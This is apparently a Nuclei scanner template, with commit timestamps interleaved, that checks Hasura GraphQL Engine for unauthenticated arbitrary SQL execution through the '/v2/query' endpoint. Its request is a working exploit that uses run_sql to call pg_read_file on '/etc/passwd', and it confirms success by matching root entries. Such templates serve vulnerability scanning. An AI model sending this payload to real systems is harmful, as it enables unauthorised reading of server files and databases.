2021-07-27 16:23:55 +00:00
id : hasura-graphql-psql-exec
2021-07-27 14:57:59 +00:00
info :
author : Udyz
2021-07-27 16:23:55 +00:00
name : Hasura GraphQL Engine - postgresql query exec
2021-07-27 14:57:59 +00:00
severity : critical
2021-10-14 13:34:15 +00:00
description : A vulnerability in Hasura GraphQL Engine allows remote unauthenticated users to execute arbitrary SQL statements via the '/v2/query' endpoint.
2021-08-02 16:45:52 +00:00
reference : https://www.exploit-db.com/exploits/49802
2021-07-27 16:23:55 +00:00
tags : hasura,rce
2021-07-27 14:57:59 +00:00
requests :
- raw :
- |
POST /v2/query HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
{
"type": "bulk" ,
"source": "default" ,
"args" : [
{
"type": "run_sql" ,
"args": {
"source" : "default" ,
"sql" : "SELECT pg_read_file('/etc/passwd',0,100000);" ,
"cascade": false ,
"read_only": false
}
}
]
}
2021-08-02 16:48:41 +00:00
2021-07-27 14:57:59 +00:00
matchers :
- type : regex
regex :
- "root:.*:0:0:"
2021-08-02 16:45:52 +00:00
part : body
